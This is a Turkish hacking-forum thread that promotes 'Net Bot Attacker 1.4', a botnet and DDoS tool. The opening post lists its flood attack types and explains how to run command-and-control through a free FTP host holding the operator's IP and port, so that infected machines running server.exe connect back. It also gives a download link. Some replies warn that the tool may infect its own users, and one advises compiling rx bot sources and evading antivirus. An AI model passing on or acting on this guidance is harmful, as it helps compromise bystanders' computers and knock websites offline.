Net Bot Attacker (Deneyin Bence :))
-
Hala Bot Net Ağınız Yok mu :) ?
O kadar uraştınız, ama bir türlü botnet ağı kuramadınız.. :( Tam 45-50 bot’a ulaşmışken irc ’den botlarınızı banladılar :( Püff dediniz :) ...
İŞTE SİZE ÇÖZÜM!.İnternette dolaşırken bulduğum programı sizinle paylaşmak istedim.Net Bot Attacker 1.4 adlı programla irc derdi olmadan botnet ağı kurabilirsiniz! Size tek lazım olan şey beleş hosttan alınmış FTP host !.
Yapabildiği attack çeşitleri : SYN Flood,ICMP Flood,UDP Flood,UDP small,TCP Flood,TCP multi-link, HTTP No-Cache Get Flood,CC Variety attack,HTTPGET
Karşı PC(ler)de yapabileceğiniz şeyler: Web sitesi ziyaret etme,Pc kapatma...
Bu kadar özellik yeter herhalde :)
Programın kullanımını 1-2 dk kurcaladığınızda hemen öğreniyorsunuz ;) Çok özellik olduğundan burda kullanımına deyinmiyeceğim..Ama kısaca şöle bi özetliyeyim. FTP Hostunuza bi text dosyasının içine ip nizi ve modeminizde açtığınız portu yazıyorsunuz.Sora oluşan server.exe açıldığı anda size bağlanıyor ;) IP Adresiniz sabit değilse ftpnizdeki text dosyasındaki ip adresini değiştirmeniz yeterli.. RahatLığa aLışın :D
DownLoad:
http://rapidshare.com/files/93112537/Net_Bot_Attacker_1.4.rar.html
NoT: Eğer programı KurcaLayarak öğrenemediyseniz VideoLu anLatım HazırLarım..
NoT2: Programı bende kullanıyorum, ve herhangi bi zararlı etKisini görmeDim. (Rahatlıkla kullanabilirsiniz)
Üreticinin AçıKLaması (İngiLizCe) :
NetBot_Attacker Is a comprehensive pressure as well as the DDOS test attack
He may control the most PC computer to start DDOS to attack!
The main attack type has:
Ordinary attack: SYN Flood,ICMP Flood,UDP Flood,UDP small,TCP Flood,TCP multi-link
WEB Attack:HTTP No-Cache Get Flood,CC Variety attack,HTTPGET
Special attack: GAME attack,CIDR attack,Hybrid attack
Auxiliary function::
Download operation,Shutdown unloading,Open URL,All shutdown
Help:You only need to have the FTP space and may use it,
Or you are fixed IP,Or your free application dynamic domain name.
Ekran GörünTüsü:
SelametLe..alıntı..
-
bence denemeyin :)
bunu kullanan kendi bot olur benden soylemesi...
ayrıca shockboy sen boyle devam edersen seni sağ komazlar banlarlar :D
-
güzel paylaşım emeğine sağlık kardeş...
-
bencede denemeyin ben bunun dili japonca olanını görmüştüm hatta videosunu falan indirmiştim videoda sağlam bi siteyi kapatıyodu :D
aynen bi müridin söylediği gibi bencede bot olursunuz. bunun yerine rx sourcelerinden birini derleyip undetect etmeye uğraşın derim. eğer böle bir alanda uğraşcaksanız.
-
hacı elin yaptıgı programa öle bi yazı yazmışınki ne diyeyim..
şu avrupa kanallarında reklam arasında doğrudan satış yapan firmaların reklamı gibi olmus.. -
xxxmstxxx bunu yazdı:
-----------------------------
güzel paylaşım emeğine sağlık kardeş...
-----------------------------Selametle
-
emeğe saygı + rep , selametle
-
kardeş bilgisayarına allah sıhat sağlık versin.. msnde hackleyebilioz mu bunla ?
-
emeğe saygı (f) selametle kardeş + rep a.e.o. (f)
-
cumanız mübarek olsun :P
-
tatarramazan bunu yazdı:
-----------------------------cumanız mübarek olsun :P
-----------------------------Ne ayaksın ya ? :D